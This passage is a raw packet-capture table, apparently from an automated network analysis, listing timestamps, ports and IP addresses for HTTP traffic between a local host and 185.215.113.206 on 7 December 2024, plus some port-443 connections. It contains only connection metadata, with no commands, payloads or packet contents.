Dec 7, 2024 10:51:48.848933935 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.849729061 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.849776030 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.849890947 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.849940062 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.850675106 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.850732088 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.850825071 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.850878954 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.851572990 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.851624966 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.851689100 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.851725101 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.852535963 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.852569103 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.852602959 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.852627039 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.853445053 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.853497982 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.853552103 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.853590965 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.854407072 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.854465008 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.854490042 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.854525089 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.855326891 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.855381012 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.855429888 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.855776072 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.856275082 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.856316090 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.856323957 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.856365919 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.857219934 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.857259035 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.857273102 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.857307911 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.858232021 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.858289003 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.858340025 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.858416080 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.859071970 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.859124899 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.859168053 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.859205008 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.860033989 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.860044956 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.860089064 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.860120058 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.861036062 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.861076117 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.861109972 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.861222982 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.861917019 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.861962080 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.862016916 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.862050056 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.862827063 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.862876892 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.862900019 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.862934113 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.863821983 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.863861084 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.863900900 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.863934040 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.864742994 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.864794016 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.864903927 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.864949942 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.865638971 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.865695000 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.865740061 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.865879059 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.866561890 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.866633892 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.949635029 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.949650049 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.949734926 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.949898958 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.949961901 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.950205088 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.950838089 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.950901985 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.950936079 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.951026917 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.951759100 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.951814890 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:48.951828003 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:48.951913118 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.012639046 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.012763023 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.013063908 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.013087034 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.013114929 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.013122082 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.013170958 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.013993025 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.014044046 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.014133930 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.014168978 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.014894962 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.014945984 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.015047073 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.015147924 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.015844107 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.015885115 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.015932083 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.016866922 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.016961098 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.017030001 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.017749071 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.017805099 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.017853975 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.017884016 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.018650055 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.018702984 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.018754005 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.018785000 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.019589901 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.019642115 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.019697905 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.019886971 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.020531893 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.020581961 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.020971060 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.021011114 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.021523952 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.021570921 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.021634102 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.021666050 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.022496939 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.022545099 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.022552967 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.022751093 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.023348093 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.023399115 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.023461103 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.023523092 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.024288893 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.024368048 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.024385929 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.024422884 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.025310993 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.025355101 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.025408983 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.026216984 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.026276112 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.026416063 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.026592016 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.027354002 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.027399063 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.027415991 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.027471066 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.028120995 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.028222084 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.028281927 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.028996944 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.029036045 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.029052973 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.029078007 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.029925108 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.030021906 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.030098915 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.030989885 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.031039953 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.031056881 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.031223059 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.031826019 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.031867981 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.031920910 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.031951904 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.032763004 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.032866001 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.032882929 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.032915115 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.033915043 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.033953905 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.034064054 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.034140110 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.034908056 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.035010099 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.035074949 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.035599947 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.035649061 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.035681009 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.035733938 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.036503077 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.036545992 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.036566019 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.036602020 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.037476063 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.037523985 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.037580013 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.037703991 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.086559057 CET	443	49823	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:49.087171078 CET	49823	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:49.087193012 CET	443	49823	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:49.087779999 CET	49823	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:49.087800026 CET	443	49823	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:49.115809917 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.183480024 CET	443	49824	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:49.184511900 CET	49824	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:49.184549093 CET	443	49824	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:49.184688091 CET	443	49825	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:49.185427904 CET	49824	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:49.185440063 CET	443	49824	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:49.185920000 CET	49825	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:49.185940981 CET	443	49825	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:49.186477900 CET	49825	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:49.186491013 CET	443	49825	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:49.186705112 CET	443	49826	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:49.187011003 CET	49826	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:49.187026024 CET	443	49826	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:49.187402010 CET	49826	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:49.187408924 CET	443	49826	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:49.191818953 CET	443	49827	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:49.192195892 CET	49827	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:49.192219973 CET	443	49827	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:49.192615032 CET	49827	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:49.192621946 CET	443	49827	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:49.235582113 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.522203922 CET	443	49823	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:49.522274971 CET	443	49823	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:49.522373915 CET	49823	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:49.522968054 CET	49823	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:49.522984982 CET	443	49823	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:49.523025036 CET	49823	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:49.523030996 CET	443	49823	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:49.526297092 CET	49829	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:49.526324034 CET	443	49829	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:49.526385069 CET	49829	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:49.526560068 CET	49829	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:49.526568890 CET	443	49829	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:49.626867056 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.626983881 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.638356924 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.638380051 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.638477087 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.638518095 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.641911030 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.641938925 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.641978979 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.642019987 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.746795893 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.749670029 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.758249998 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.758419991 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.761631012 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.761647940 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.761704922 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.869719982 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.869740963 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.869752884 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.869765043 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.869775057 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.869787931 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.869792938 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.869805098 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.869817972 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.869828939 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.869839907 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.869842052 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.869851112 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.869862080 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.869874001 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.869877100 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.869894028 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.869913101 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.869924068 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.869977951 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.869988918 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.869999886 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.870014906 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.870024920 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.870033979 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.870043993 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.870059013 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.870062113 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.870078087 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.870090008 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.870090008 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.870116949 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.870117903 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.870130062 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.870140076 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.870141029 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.870153904 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.870163918 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.870163918 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.870193005 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.870846033 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.870860100 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.870872021 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.870904922 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.870960951 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.870973110 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.870982885 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.870995045 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.871001959 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.871006012 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.871018887 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.871031046 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.871035099 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.871051073 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.871062040 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.871064901 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.871074915 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.871079922 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.871112108 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.871716976 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.871777058 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.871805906 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.871974945 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.871987104 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.871997118 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.872009039 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.872019053 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.872025967 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.872030973 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.872042894 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.872054100 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.872065067 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.872066021 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.872076988 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.872087955 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.872087955 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.872103930 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.872109890 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.872116089 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.872123957 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.872150898 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.872751951 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.872766972 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.872777939 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.872790098 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.872798920 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.872811079 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.872832060 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.872843027 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.872843981 CET	49808	80	192.168.2.6	185.215.113.206
